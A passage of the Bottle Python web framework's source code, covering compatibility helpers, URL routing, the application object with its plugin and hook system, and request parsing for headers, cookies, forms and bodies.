dropped in future versions of Bottle." warnings.warn(msg, DeprecationWarning) from UserDict import DictMixin def next(it): return it.next() bytes = str else: # 2.6, 2.7 from collections import MutableMapping as DictMixin unicode = unicode json_loads = json_lds eval(compile('def _raise(*a): raise a[0], a[1], a[2]', '<py3fix>', 'exec')) # Some helpers for string/byte handling def tob(s, enc='utf8'): return s.encode(enc) if isinstance(s, unicode) else bytes(s) def touni(s, enc='utf8', err='strict'): if isinstance(s, bytes): return s.decode(enc, err) else: return unicode(s or ("" if s is None else s)) tonat = touni if py3k else tob # 3.2 fixes cgi.FieldStorage to accept bytes (which makes a lot of sense). # 3.1 needs a workaround. if py31: from io import TextIOWrapper class NCTextIOWrapper(TextIOWrapper): def close(self): pass # Keep wrapped buffer open. # A bug in functools causes it to break if the wrapper is an instance method def update_wrapper(wrapper, wrapped, *a, **ka): try: functools.update_wrapper(wrapper, wrapped, *a, **ka) except AttributeError: pass # These helpers are used at module level and need to be defined first. # And yes, I know PEP-8, but sometimes a lower-case classname makes more sense. def depr(message, strict=False): warnings.warn(message, DeprecationWarning, stacklevel=3) def makelist(data): # This is just to handy if isinstance(data, (tuple, list, set, dict)): return list(data) elif data: return [data] else: return [] class DictProperty(object): """ Property that maps to a key in a local dict-like attribute. """ def __init__(self, attr, key=None, read_only=False): self.attr, self.key, self.read_only = attr, key, read_only def __call__(self, func): functools.update_wrapper(self, func, updated=[]) self.getter, self.key = func, self.key or func.__name__ return self def __get__(self, obj, cls): if obj is None: return self key, storage = self.key, getattr(obj, self.attr) if key not in storage: storage[key] = self.getter(obj) return storage[key] def __set__(self, obj, value): if self.read_only: raise AttributeError("Read-Only property.") getattr(obj, self.attr)[self.key] = value def __delete__(self, obj): if self.read_only: raise AttributeError("Read-Only property.") del getattr(obj, self.attr)[self.key] class cached_property(object): """ A property that is only computed once per instance and then replaces itself with an ordinary attribute. Deleting the attribute resets the property. """ def __init__(self, func): self.__doc__ = getattr(func, '__doc__') self.func = func def __get__(self, obj, cls): if obj is None: return self value = obj.__dict__[self.func.__name__] = self.func(obj) return value class lazy_attribute(object): """ A property that caches itself to the class object. """ def __init__(self, func): functools.update_wrapper(self, func, updated=[]) self.getter = func def __get__(self, obj, cls): value = self.getter(cls) setattr(cls, self.__name__, value) return value ############################################################################### # Exceptions and Events ######################################################## ############################################################################### class BottleException(Exception): """ A base class for exceptions used by bottle. """ pass ############################################################################### # Routing ###################################################################### ############################################################################### class RouteError(BottleException): """ This is a base class for all routing related exceptions """ class RouteReset(BottleException): """ If raised by a plugin or request handler, the route is reset and all plugins are re-applied. """ class RouterUnknownModeError(RouteError): pass class RouteSyntaxError(RouteError): """ The route parser found something not supported by this router. """ class RouteBuildError(RouteError): """ The route could not be built. """ def _re_flatten(p): """ Turn all capturing groups in a regular expression pattern into non-capturing groups. """ if '(' not in p: return p return re.sub(r'(\\*)(\(\?P<[^>]+>|\((?!\?))', lambda m: m.group(0) if len(m.group(1)) % 2 else m.group(1) + '(?:', p) class Router(object): """ A Router is an ordered collection of route->target pairs. It is used to efficiently match WSGI requests against a number of routes and return the first target that satisfies the request. The target may be anything, usually a string, ID or callable object. A route consists of a path-rule and a HTTP method. The path-rule is either a static path (e.g. `/contact`) or a dynamic path that contains wildcards (e.g. `/wiki/<page>`). The wildcard syntax and details on the matching order are described in docs:`routing`. """ default_pattern = '[^/]+' default_filter = 're' #: The current CPython regexp implementation does not allow more #: than 99 matching groups per regular expression. _MAX_GROUPS_PER_PATTERN = 99 def __init__(self, strict=False): self.rules = [] # All rules in order self._groups = {} # index of regexes to find them in dyna_routes self.builder = {} # Data structure for the url builder self.static = {} # Search structure for static routes self.dyna_routes = {} self.dyna_regexes = {} # Search structure for dynamic routes #: If true, static routes are no longer checked first. self.strict_order = strict self.filters = { 're': lambda conf: (_re_flatten(conf or self.default_pattern), None, None), 'int': lambda conf: (r'-?\d+', int, lambda x: str(int(x))), 'float': lambda conf: (r'-?[\d.]+', float, lambda x: str(float(x))), 'path': lambda conf: (r'.+?', None, None)} def add_filter(self, name, func): """ Add a filter. The provided function is called with the configuration string as parameter and must return a (regexp, to_python, to_url) tuple. The first element is a string, the last two are callables or None. """ self.filters[name] = func rule_syntax = re.compile('(\\\\*)' '(?:(?::([a-zA-Z_][a-zA-Z_0-9]*)?()(?:#(.*?)#)?)' '|(?:<([a-zA-Z_][a-zA-Z_0-9]*)?(?::([a-zA-Z_]*)' '(?::((?:\\\\.|[^\\\\>]+)+)?)?)?>))') def _itertokens(self, rule): offset, prefix = 0, '' for match in self.rule_syntax.finditer(rule): prefix += rule[offset:match.start()] g = match.groups() if len(g[0])%2: # Escaped wildcard prefix += match.group(0)[len(g[0]):] offset = match.end() continue if prefix: yield prefix, None, None name, filtr, conf = g[4:7] if g[2] is None else g[1:4] yield name, filtr or 'default', conf or None offset, prefix = match.end(), '' if offset <= len(rule) or prefix: yield prefix+rule[offset:], None, None def add(self, rule, method, target, name=None): """ Add a new rule or replace the target for an existing rule. """ anons = 0 # Number of anonymous wildcards found keys = [] # Names of keys pattern = '' # Regular expression pattern with named groups filters = [] # Lists of wildcard input filters builder = [] # Data structure for the URL builder is_static = True for key, mode, conf in self._itertokens(rule): if mode: is_static = False if mode == 'default': mode = self.default_filter mask, in_filter, out_filter = self.filters[mode](conf) if not key: pattern += '(?:%s)' % mask key = 'anon%d' % anons anons += 1 else: pattern += '(?P<%s>%s)' % (key, mask) keys.append(key) if in_filter: filters.append((key, in_filter)) builder.append((key, out_filter or str)) elif key: pattern += re.escape(key) builder.append((None, key)) self.builder[rule] = builder if name: self.builder[name] = builder if is_static and not self.strict_order: self.static.setdefault(method, {}) self.static[method][self.build(rule)] = (target, None) return try: re_pattern = re.compile('^(%s)$' % pattern) re_match = re_pattern.match except re.error: raise RouteSyntaxError("Could not add Route: %s (%s)" % (rule, _e())) if filters: def getargs(path): url_args = re_match(path).groupdict() for name, wildcard_filter in filters: try: url_args[name] = wildcard_filter(url_args[name]) except ValueError: raise HTTPError(400, 'Path has wrong format.') return url_args elif re_pattern.groupindex: def getargs(path): return re_match(path).groupdict() else: getargs = None flatpat = _re_flatten(pattern) whole_rule = (rule, flatpat, target, getargs) if (flatpat, method) in self._groups: if DEBUG: msg = 'Route <%s %s> overwrites a previously defined route' warnings.warn(msg % (method, rule), RuntimeWarning) self.dyna_routes[method][self._groups[flatpat, method]] = whole_rule else: self.dyna_routes.setdefault(method, []).append(whole_rule) self._groups[flatpat, method] = len(self.dyna_routes[method]) - 1 self._compile(method) def _compile(self, method): all_rules = self.dyna_routes[method] comborules = self.dyna_regexes[method] = [] maxgroups = self._MAX_GROUPS_PER_PATTERN for x in range(0, len(all_rules), maxgroups): some = all_rules[x:x+maxgroups] combined = (flatpat for (_, flatpat, _, _) in some) combined = '|'.join('(^%s$)' % flatpat for flatpat in combined) combined = re.compile(combined).match rules = [(target, getargs) for (_, _, target, getargs) in some] comborules.append((combined, rules)) def build(self, _name, *anons, **query): """ Build an URL by filling the wildcards in a rule. """ builder = self.builder.get(_name) if not builder: raise RouteBuildError("No route with that name.", _name) try: for i, value in enumerate(anons): query['anon%d'%i] = value url = ''.join([f(query.pop(n)) if n else f for (n,f) in builder]) return url if not query else url+'?'+urlencode(query) except KeyError: raise RouteBuildError('Missing URL argument: %r' % _e().args[0]) def match(self, environ): """ Return a (target, url_agrs) tuple or raise HTTPError(400/404/405). """ verb = environ['REQUEST_METHOD'].upper() path = environ['PATH_INFO'] or '/' if verb == 'HEAD': methods = ['PROXY', verb, 'GET', 'ANY'] else: methods = ['PROXY', verb, 'ANY'] for method in methods: if method in self.static and path in self.static[method]: target, getargs = self.static[method][path] return target, getargs(path) if getargs else {} elif method in self.dyna_regexes: for combined, rules in self.dyna_regexes[method]: match = combined(path) if match: target, getargs = rules[match.lastindex - 1] return target, getargs(path) if getargs else {} # No matching route found. Collect alternative methods for 405 response allowed = set([]) nocheck = set(methods) for method in set(self.static) - nocheck: if path in self.static[method]: allowed.add(verb) for method in set(self.dyna_regexes) - allowed - nocheck: for combined, rules in self.dyna_regexes[method]: match = combined(path) if match: allowed.add(method) if allowed: allow_header = ",".join(sorted(allowed)) raise HTTPError(405, "Method not allowed.", Allow=allow_header) # No matching route and no alternative method found. We give up raise HTTPError(404, "Not found: " + repr(path)) class Route(object): """ This class wraps a route callback along with route specific metadata and configuration and applies Plugins on demand. It is also responsible for turing an URL path rule into a regular expression usable by the Router. """ def __init__(self, app, rule, method, callback, name=None, plugins=None, skiplist=None, **config): #: The application this route is installed to. self.app = app #: The path-rule string (e.g. ``/wiki/:page``). self.rule = rule #: The HTTP method as a string (e.g. ``GET``). self.method = method #: The original callback with no plugins applied. Useful for introspection. self.callback = callback #: The name of the route (if specified) or ``None``. self.name = name or None #: A list of route-specific plugins (see :meth:`Bottle.route`). self.plugins = plugins or [] #: A list of plugins to not apply to this route (see :meth:`Bottle.route`). self.skiplist = skiplist or [] #: Additional keyword arguments passed to the :meth:`Bottle.route` #: decorator are stored in this dictionary. Used for route-specific #: plugin configuration and meta-data. self.config = ConfigDict().load_dict(config) @cached_property def call(self): """ The route callback with all plugins applied. This property is created on demand and then cached to speed up subsequent requests.""" return self._make_callback() def reset(self): """ Forget any cached values. The next time :attr:`call` is accessed, all plugins are re-applied. """ self.__dict__.pop('call', None) def prepare(self): """ Do all on-demand work immediately (useful for debugging).""" self.call def all_plugins(self): """ Yield all Plugins affecting this route. """ unique = set() for p in reversed(self.app.plugins + self.plugins): if True in self.skiplist: break name = getattr(p, 'name', False) if name and (name in self.skiplist or name in unique): continue if p in self.skiplist or type(p) in self.skiplist: continue if name: unique.add(name) yield p def _make_callback(self): callback = self.callback for plugin in self.all_plugins(): try: if hasattr(plugin, 'apply'): callback = plugin.apply(callback, self) else: callback = plugin(callback) except RouteReset: # Try again with changed configuration. return self._make_callback() if not callback is self.callback: update_wrapper(callback, self.callback) return callback def get_undecorated_callback(self): """ Return the callback. If the callback is a decorated function, try to recover the original function. """ func = self.callback func = getattr(func, '__func__' if py3k else 'im_func', func) closure_attr = '__closure__' if py3k else 'func_closure' while hasattr(func, closure_attr) and getattr(func, closure_attr): func = getattr(func, closure_attr)[0].cell_contents return func def get_callback_args(self): """ Return a list of argument names the callback (most likely) accepts as keyword arguments. If the callback is a decorated function, try to recover the original function before inspection. """ return getargspec(self.get_undecorated_callback())[0] def get_config(self, key, default=None): """ Lookup a config field and return its value, first checking the route.config, then route.app.config.""" for conf in (self.config, self.app.conifg): if key in conf: return conf[key] return default def __repr__(self): cb = self.get_undecorated_callback() return '<%s %r %r>' % (self.method, self.rule, cb) ############################################################################### # Application Object ########################################################### ############################################################################### class Bottle(object): """ Each Bottle object represents a single, distinct web application and consists of routes, callbacks, plugins, resources and configuration. Instances are callable WSGI applications. :param catchall: If true (default), handle all exceptions. Turn off to let debugging middleware handle exceptions. """ def __init__(self, catchall=True, autojson=True): #: A :class:`ConfigDict` for app specific configuration. self.config = ConfigDict() self.config._on_change = functools.partial(self.trigger_hook, 'config') self.config.meta_set('autojson', 'validate', bool) self.config.meta_set('catchall', 'validate', bool) self.config['catchall'] = catchall self.config['autojson'] = autojson #: A :class:`ResourceManager` for application files self.resources = ResourceManager() self.routes = [] # List of installed :class:`Route` instances. self.router = Router() # Maps requests to :class:`Route` instances. self.error_handler = {} # Core plugins self.plugins = [] # List of installed plugins. if self.config['autojson']: self.install(JSONPlugin()) self.install(TemplatePlugin()) #: If true, most exceptions are caught and returned as :exc:`HTTPError` catchall = DictProperty('config', 'catchall') __hook_names = 'before_request', 'after_request', 'app_reset', 'config' __hook_reversed = 'after_request' @cached_property def _hooks(self): return dict((name, []) for name in self.__hook_names) def add_hook(self, name, func): """ Attach a callback to a hook. Three hooks are currently implemented: before_request Executed once before each request. The request context is available, but no routing has happened yet. after_request Executed once after each request regardless of its outcome. app_reset Called whenever :meth:`Bottle.reset` is called. """ if name in self.__hook_reversed: self._hooks[name].insert(0, func) else: self._hooks[name].append(func) def remove_hook(self, name, func): """ Remove a callback from a hook. """ if name in self._hooks and func in self._hooks[name]: self._hooks[name].remove(func) return True def trigger_hook(self, __name, *args, **kwargs): """ Trigger a hook and return a list of results. """ return [hook(*args, **kwargs) for hook in self._hooks[__name][:]] def hook(self, name): """ Return a decorator that attaches a callback to a hook. See :meth:`add_hook` for details.""" def decorator(func): self.add_hook(name, func) return func return decorator def mount(self, prefix, app, **options): """ Mount an application (:class:`Bottle` or plain WSGI) to a specific URL prefix. Example:: root_app.mount('/admin/', admin_app) :param prefix: path prefix or `mount-point`. If it ends in a slash, that slash is mandatory. :param app: an instance of :class:`Bottle` or a WSGI application. All other parameters are passed to the underlying :meth:`route` call. """ segments = [p for p in prefix.split('/') if p] if not segments: raise ValueError('Empty path prefix.') path_depth = len(segments) def mountpoint_wrapper(): try: request.path_shift(path_depth) rs = HTTPResponse([]) def start_response(status, headerlist, exc_info=None): if exc_info: _raise(*exc_info) rs.status = status for name, value in headerlist: rs.add_header(name, value) return rs.body.append body = app(request.environ, start_response) if body and rs.body: body = itertools.chain(rs.body, body) rs.body = body or rs.body return rs finally: request.path_shift(-path_depth) options.setdefault('skip', True) options.setdefault('method', 'PROXY') options.setdefault('mountpoint', {'prefix': prefix, 'target': app}) options['callback'] = mountpoint_wrapper self.route('/%s/<:re:.*>' % '/'.join(segments), **options) if not prefix.endswith('/'): self.route('/' + '/'.join(segments), **options) def merge(self, routes): """ Merge the routes of another :class:`Bottle` application or a list of :class:`Route` objects into this application. The routes keep their 'owner', meaning that the :data:`Route.app` attribute is not changed. """ if isinstance(routes, Bottle): routes = routes.routes for route in routes: self.add_route(route) def install(self, plugin): """ Add a plugin to the list of plugins and prepare it for being applied to all routes of this application. A plugin may be a simple decorator or an object that implements the :class:`Plugin` API. """ if hasattr(plugin, 'setup'): plugin.setup(self) if not callable(plugin) and not hasattr(plugin, 'apply'): raise TypeError("Plugins must be callable or implement .apply()") self.plugins.append(plugin) self.reset() return plugin def uninstall(self, plugin): """ Uninstall plugins. Pass an instance to remove a specific plugin, a type object to remove all plugins that match that type, a string to remove all plugins with a matching ``name`` attribute or ``True`` to remove all plugins. Return the list of removed plugins. """ removed, remove = [], plugin for i, plugin in list(enumerate(self.plugins))[::-1]: if remove is True or remove is plugin or remove is type(plugin) \ or getattr(plugin, 'name', True) == remove: removed.append(plugin) del self.plugins[i] if hasattr(plugin, 'close'): plugin.close() if removed: self.reset() return removed def reset(self, route=None): """ Reset all routes (force plugins to be re-applied) and clear all caches. If an ID or route object is given, only that specific route is affected. """ if route is None: routes = self.routes elif isinstance(route, Route): routes = [route] else: routes = [self.routes[route]] for route in routes: route.reset() if DEBUG: for route in routes: route.prepare() self.trigger_hook('app_reset') def close(self): """ Close the application and all installed plugins. """ for plugin in self.plugins: if hasattr(plugin, 'close'): plugin.close() def run(self, **kwargs): """ Calls :func:`run` with the same parameters. """ run(self, **kwargs) def match(self, environ): """ Search for a matching route and return a (:class:`Route` , urlargs) tuple. The second value is a dictionary with parameters extracted from the URL. Raise :exc:`HTTPError` (404/405) on a non-match.""" return self.router.match(environ) def get_url(self, routename, **kargs): """ Return a string that matches a named route """ scriptname = request.environ.get('SCRIPT_NAME', '').strip('/') + '/' location = self.router.build(routename, **kargs).lstrip('/') return urljoin(urljoin('/', scriptname), location) def add_route(self, route): """ Add a route object, but do not change the :data:`Route.app` attribute.""" self.routes.append(route) self.router.add(route.rule, route.method, route, name=route.name) if DEBUG: route.prepare() def route(self, path=None, method='GET', callback=None, name=None, apply=None, skip=None, **config): """ A decorator to bind a function to a request URL. Example:: @app.route('/hello/:name') def hello(name): return 'Hello %s' % name The ``:name`` part is a wildcard. See :class:`Router` for syntax details. :param path: Request path or a list of paths to listen to. If no path is specified, it is automatically generated from the signature of the function. :param method: HTTP method (`GET`, `POST`, `PUT`, ...) or a list of methods to listen to. (default: `GET`) :param callback: An optional shortcut to avoid the decorator syntax. ``route(..., callback=func)`` equals ``route(...)(func)`` :param name: The name for this route. (default: None) :param apply: A decorator or plugin or a list of plugins. These are applied to the route callback in addition to installed plugins. :param skip: A list of plugins, plugin classes or names. Matching plugins are not installed to this route. ``True`` skips all. Any additional keyword arguments are stored as route-specific configuration and passed to plugins (see :meth:`Plugin.apply`). """ if callable(path): path, callback = None, path plugins = makelist(apply) skiplist = makelist(skip) def decorator(callback): if isinstance(callback, basestring): callback = load(callback) for rule in makelist(path) or yieldroutes(callback): for verb in makelist(method): verb = verb.upper() route = Route(self, rule, verb, callback, name=name, plugins=plugins, skiplist=skiplist, **config) self.add_route(route) return callback return decorator(callback) if callback else decorator def get(self, path=None, method='GET', **options): """ Equals :meth:`route`. """ return self.route(path, method, **options) def post(self, path=None, method='POST', **options): """ Equals :meth:`route` with a ``POST`` method parameter. """ return self.route(path, method, **options) def put(self, path=None, method='PUT', **options): """ Equals :meth:`route` with a ``PUT`` method parameter. """ return self.route(path, method, **options) def delete(self, path=None, method='DELETE', **options): """ Equals :meth:`route` with a ``DELETE`` method parameter. """ return self.route(path, method, **options) def patch(self, path=None, method='PATCH', **options): """ Equals :meth:`route` with a ``PATCH`` method parameter. """ return self.route(path, method, **options) def error(self, code=500): """ Decorator: Register an output handler for a HTTP error code""" def wrapper(handler): self.error_handler[int(code)] = handler return handler return wrapper def default_error_handler(self, res): return tob(template(ERROR_PAGE_TEMPLATE, e=res)) def _handle(self, environ): path = environ['bottle.raw_path'] = environ['PATH_INFO'] if py3k: try: environ['PATH_INFO'] = path.encode('latin1').decode('utf8') except UnicodeError: return HTTPError(400, 'Invalid path string. Expected UTF-8') try: environ['bottle.app'] = self request.bind(environ) response.bind() try: self.trigger_hook('before_request') route, args = self.router.match(environ) environ['route.handle'] = route environ['bottle.route'] = route environ['route.url_args'] = args return route.call(**args) finally: self.trigger_hook('after_request') except HTTPResponse: return _e() except RouteReset: route.reset() return self._handle(environ) except (KeyboardInterrupt, SystemExit, MemoryError): raise except Exception: if not self.catchall: raise stacktrace = format_exc() environ['wsgi.errors'].write(stacktrace) return HTTPError(500, "Internal Server Error", _e(), stacktrace) def _cast(self, out, peek=None): """ Try to convert the parameter into something WSGI compatible and set correct HTTP headers when possible. Support: False, str, unicode, dict, HTTPResponse, HTTPError, file-like, iterable of strings and iterable of unicodes """ # Empty output is done here if not out: if 'Content-Length' not in response: response['Content-Length'] = 0 return [] # Join lists of byte or unicode strings. Mixed lists are NOT supported if isinstance(out, (tuple, list))\ and isinstance(out[0], (bytes, unicode)): out = out[0][0:0].join(out) # b'abc'[0:0] -> b'' # Encode unicode strings if isinstance(out, unicode): out = out.encode(response.charset) # Byte Strings are just returned if isinstance(out, bytes): if 'Content-Length' not in response: response['Content-Length'] = len(out) return [out] # HTTPError or HTTPException (recursive, because they may wrap anything) # TODO: Handle these explicitly in handle() or make them iterable. if isinstance(out, HTTPError): out.apply(response) out = self.error_handler.get(out.status_code, self.default_error_handler)(out) return self._cast(out) if isinstance(out, HTTPResponse): out.apply(response) return self._cast(out.body) # File-like objects. if hasattr(out, 'read'): if 'wsgi.file_wrapper' in request.environ: return request.environ['wsgi.file_wrapper'](out) elif hasattr(out, 'close') or not hasattr(out, '__iter__'): return WSGIFileWrapper(out) # Handle Iterables. We peek into them to detect their inner type. try: iout = iter(out) first = next(iout) while not first: first = next(iout) except StopIteration: return self._cast('') except HTTPResponse: first = _e() except (KeyboardInterrupt, SystemExit, MemoryError): raise except: if not self.catchall: raise first = HTTPError(500, 'Unhandled exception', _e(), format_exc()) # These are the inner types allowed in iterator or generator objects. if isinstance(first, HTTPResponse): return self._cast(first) elif isinstance(first, bytes): new_iter = itertools.chain([first], iout) elif isinstance(first, unicode): encoder = lambda x: x.encode(response.charset) new_iter = imap(encoder, itertools.chain([first], iout)) else: msg = 'Unsupported response type: %s' % type(first) return self._cast(HTTPError(500, msg)) if hasattr(out, 'close'): new_iter = _closeiter(new_iter, out.close) return new_iter def wsgi(self, environ, start_response): """ The bottle WSGI-interface. """ try: out = self._cast(self._handle(environ)) # rfc2616 section 4.3 if response._status_code in (100, 101, 204, 304)\ or environ['REQUEST_METHOD'] == 'HEAD': if hasattr(out, 'close'): out.close() out = [] start_response(response._status_line, response.headerlist) return out except (KeyboardInterrupt, SystemExit, MemoryError): raise except: if not self.catchall: raise err = '<h1>Critical error while processing request: %s</h1>' \ % html_escape(environ.get('PATH_INFO', '/')) if DEBUG: err += '<h2>Error:</h2>\n<pre>\n%s\n</pre>\n' \ '<h2>Traceback:</h2>\n<pre>\n%s\n</pre>\n' \ % (html_escape(repr(_e())), html_escape(format_exc())) environ['wsgi.errors'].write(err) headers = [('Content-Type', 'text/html; charset=UTF-8')] start_response('500 INTERNAL SERVER ERROR', headers, sys.exc_info()) return [tob(err)] def __call__(self, environ, start_response): """ Each instance of :class:'Bottle' is a WSGI application. """ return self.wsgi(environ, start_response) def __enter__(self): """ Use this application as default for all module-level shortcuts. """ default_app.push(self) return self def __exit__(self, exc_type, exc_value, traceback): default_app.pop() ############################################################################### # HTTP and WSGI Tools ########################################################## ############################################################################### class BaseRequest(object): """ A wrapper for WSGI environment dictionaries that adds a lot of convenient access methods and properties. Most of them are read-only. Adding new attributes to a request actually adds them to the environ dictionary (as 'bottle.request.ext.<name>'). This is the recommended way to store and access request-specific data. """ __slots__ = ('environ', ) #: Maximum size of memory buffer for :attr:`body` in bytes. MEMFILE_MAX = 102400 def __init__(self, environ=None): """ Wrap a WSGI environ dictionary. """ #: The wrapped WSGI environ dictionary. This is the only real attribute. #: All other attributes actually are read-only properties. self.environ = {} if environ is None else environ self.environ['bottle.request'] = self @DictProperty('environ', 'bottle.app', read_only=True) def app(self): """ Bottle application handling this request. """ raise RuntimeError('This request is not connected to an application.') @DictProperty('environ', 'bottle.route', read_only=True) def route(self): """ The bottle :class:`Route` object that matches this request. """ raise RuntimeError('This request is not connected to a route.') @DictProperty('environ', 'route.url_args', read_only=True) def url_args(self): """ The arguments extracted from the URL. """ raise RuntimeError('This request is not connected to a route.') @property def path(self): """ The value of ``PATH_INFO`` with exactly one prefixed slash (to fix broken clients and avoid the "empty path" edge case). """ return '/' + self.environ.get('PATH_INFO','').lstrip('/') @property def method(self): """ The ``REQUEST_METHOD`` value as an uppercase string. """ return self.environ.get('REQUEST_METHOD', 'GET').upper() @DictProperty('environ', 'bottle.request.headers', read_only=True) def headers(self): """ A :class:`WSGIHeaderDict` that provides case-insensitive access to HTTP request headers. """ return WSGIHeaderDict(self.environ) def get_header(self, name, default=None): """ Return the value of a request header, or a given default value. """ return self.headers.get(name, default) @DictProperty('environ', 'bottle.request.cookies', read_only=True) def cookies(self): """ Cookies parsed into a :class:`FormsDict`. Signed cookies are NOT decoded. Use :meth:`get_cookie` if you expect signed cookies. """ cookies = SimpleCookie(self.environ.get('HTTP_COOKIE','')).values() return FormsDict((c.key, c.value) for c in cookies) def get_cookie(self, key, default=None, secret=None): """ Return the content of a cookie. To read a `Signed Cookie`, the `secret` must match the one used to create the cookie (see :meth:`BaseResponse.set_cookie`). If anything goes wrong (missing cookie or wrong signature), return a default value. """ value = self.cookies.get(key) if secret and value: dec = cookie_decode(value, secret) # (key, value) tuple or None return dec[1] if dec and dec[0] == key else default return value or default @DictProperty('environ', 'bottle.request.query', read_only=True) def query(self): """ The :attr:`query_string` parsed into a :class:`FormsDict`. These values are sometimes called "URL arguments" or "GET parameters", but not to be confused with "URL wildcards" as they are provided by the :class:`Router`. """ get = self.environ['bottle.get'] = FormsDict() pairs = _parse_qsl(self.environ.get('QUERY_STRING', '')) for key, value in pairs: get[key] = value return get @DictProperty('environ', 'bottle.request.forms', read_only=True) def forms(self): """ Form values parsed from an `url-encoded` or `multipart/form-data` encoded POST or PUT request body. The result is returned as a :class:`FormsDict`. All keys and values are strings. File uploads are stored separately in :attr:`files`. """ forms = FormsDict() for name, item in self.POST.allitems(): if not isinstance(item, FileUpload): forms[name] = item return forms @DictProperty('environ', 'bottle.request.params', read_only=True) def params(self): """ A :class:`FormsDict` with the combined values of :attr:`query` and :attr:`forms`. File uploads are stored in :attr:`files`. """ params = FormsDict() for key, value in self.query.allitems(): params[key] = value for key, value in self.forms.allitems(): params[key] = value return params @DictProperty('environ', 'bottle.request.files', read_only=True) def files(self): """ File uploads parsed from `multipart/form-data` encoded POST or PUT request body. The values are instances of :class:`FileUpload`. """ files = FormsDict() for name, item in self.POST.allitems(): if isinstance(item, FileUpload): files[name] = item return files @DictProperty('environ', 'bottle.request.json', read_only=True) def json(self): """ If the ``Content-Type`` header is ``application/json``, this property holds the parsed content of the request body. Only requests smaller than :attr:`MEMFILE_MAX` are processed to avoid memory exhaustion. """ ctype = self.environ.get('CONTENT_TYPE', '').lower().split(';')[0] if ctype == 'application/json': b = self._get_body_string() if not b: return None return json_loads(b) return None def _iter_body(self, read, bufsize): maxread = max(0, self.content_length) while maxread: part = read(min(maxread, bufsize)) if not part: break yield part maxread -= len(part) @staticmethod def _iter_chunked(read, bufsize): err = HTTPError(400, 'Error while parsing chunked transfer body.') rn, sem, bs = tob('\r\n'), tob(';'), tob('') while True: header = read(1) while header[-2:] != rn: c = read(1) header += c if not c: raise err if len(header) > bufsize: raise err size, _, _ = header.partition(sem) try: maxread = int(tonat(size.strip()), 16) except ValueError: raise err if maxread == 0: break buff = bs while maxread > 0: if not buff: buff = read(min(maxread, bufsize)) part, buff = buff[:maxread], buff[maxread:] if not part: raise err yield part maxread -= len(part) if read(2) != rn: raise err @DictProperty('environ', 'bottle.request.body', read_only=True) def _body(self): body_iter = self._iter_chunked if self.chunked else self._iter_body read_func = self.environ['wsgi.input'].read body, body_size, is_temp_file = BytesIO(), 0, False for part in body_iter(read_func, self.MEMFILE_MAX): body.write(part) body_size += len(part) if not is_temp_file and body_size > self.MEMFILE_MAX: body, tmp = TemporaryFile(mode='w+b'), body body.write(tmp.getvalue()) del tmp is_temp_file = True self.environ['wsgi.input'] = body body.seek(0) return body def _get_body_string(self): """ read body until content-length or MEMFILE_MAX into a string. Raise HTTPError(413) on requests that are to large. """ clen = self.content_length if clen > self.MEMFILE_MAX: raise HTTPError(413, 'Request too large') if clen < 0: clen = self.MEMFILE_MAX + 1 data = self.body.read(clen) if len(data) > self.MEMFILE_MAX: # Fail fast raise HTTPError(413, 'Request too large') return data @property def body(self): """ The HTTP request body as a seek-able file-like object. Depending on :attr:`MEMFILE_MAX`, this is either a temporary file or a :class:`io.BytesIO` instance. Accessing this property for the first time reads and replaces the ``wsgi.input`` environ variable. Subsequent accesses just do a `seek(0)` on the file object. """ self._body.seek(0) return self._body @property def chunked(self): """ True if Chunked transfer encoding was. """ return 'chunked' in self.environ.get('HTTP_TRANSFER_ENCODING', '').lower() #: An alias for :attr:`query`. GET = query @DictProperty('environ', 'bottle.request.post', read_only=True) def POST(self): """ The values of :attr:`forms` and :attr:`files` combined into a single :class:`FormsDict`. Values are either strings (form values) or instances of :class:`cgi.FieldStorage` (file uploads). """ post = FormsDict() # We default to application/x-www-form-urlencoded for everything that # is not multipart and take the fast path (also: 3.1 workaround) if not self.content_type.startswith('multipart/'): pairs = _parse_qsl(tonat(self._get_body_string(), 'latin1')) for key, value in pairs: post[key] = value return post safe_env = {'QUERY_STRING':''} # Build a safe environment for cgi for key in ('REQUEST_METHOD', 'CONTENT_TYPE', 'CONTENT_LENGTH'): if key in self.environ: safe_env[key] = self.environ[key] args = dict(fp=self.body, environ=safe_env, keep_blank_values=True) if py31: args['fp'] = NCTextIOWrapper(args['fp'], encoding='utf8', newline='\n') elif py3k: args['encoding'] = 'utf8' data = cgi.FieldStorage(**args) self['_cgi.FieldStorage'] = data #http://bugs.python.org/issue18394#msg207958 data = data.list or [] for item in data: if item.filename: post[item.name] = FileUpload(item.file, item.name, item.filename, item.headers) else: post[item.name] = item.value return post @property def url(self): """ The full request URI including hostname and scheme. If your app lives behind a reverse proxy or load balancer and you get confusing results, make sure that the ``X-Forwarded-Host`` header is set correctly. """ return self.urlparts.geturl() @DictProperty('environ', 'bottle.request.urlparts', read_only=True) def urlparts(self): """ The :attr:`url` string as an :class:`urlparse.SplitResult` tuple. The tuple contains (scheme, host, path, query_string and fragment), but the fragment is always empty because it is not visible to the server. """ env = self.environ http = env.get('HTTP_X_FORWARDED_PROTO') or env.get('wsgi.url_scheme', 'http') host = env.get('HTTP_X_FORWARDED_HOST') or env.get('HTTP_HOST') if not host: # HTTP 1.1 requires a Host-header. This is for HTTP/1.0 clients. host = env.get('SERVER_NAME', '127.0.0.1') port = env.get('SERVER_PORT') if port and port != ('80' if http == 'http' else '443'): host += ':' + port path = urlquote(self.fullpath) return UrlSplitResult(http, host, path, env.get('QUERY_STRING'), '') @property def fullpath(self): """ Request path including :attr:`script_name` (if present). """ return urljoin(self.script_name, self.path.lstrip('/')) @property def query_string(self): """ The raw :attr:`query` part of the URL (everything in between ``?`` and ``#``) as a string. """ return self.environ.get('QUERY_STRING', '') @property def script_name(self): """ The initial portion of the URL's `path` that was removed by a higher level (server or routing middleware) before the application was called. This script path is returned with leading and tailing slashes. """ script_name = self.environ.get('SCRIPT_NAME', '').strip('/') return '/' + script_name + '/' if script_name else '/' def path_shift(self, shift=1): """ Shift path segments from :attr:`path` to :attr:`script_name` and vice versa. :param shift: The number of path segments to shift. May be negative to change the shift direction. (default: 1) """ script = self.environ.get('SCRIPT_NAME','/') self['SCRIPT_NAME'], self['PATH_INFO'] = path_shift(script, self.path, shift) @property def content_length(self): """ The request body length as an integer. The client is responsible to set this header. Otherwise, the real length of the body is unknown and -1 is returned. In this case, :attr:`body` will be empty. """ return int(self.environ.get('CONTENT_LENGTH') or -1) @property def content_type(self): """ The Content-Type header as a lowercase-string (default: empty). """ return self.environ.get('CONTENT_TYPE', '').lower() @property def is_xhr(self): """ True if the request was triggered by 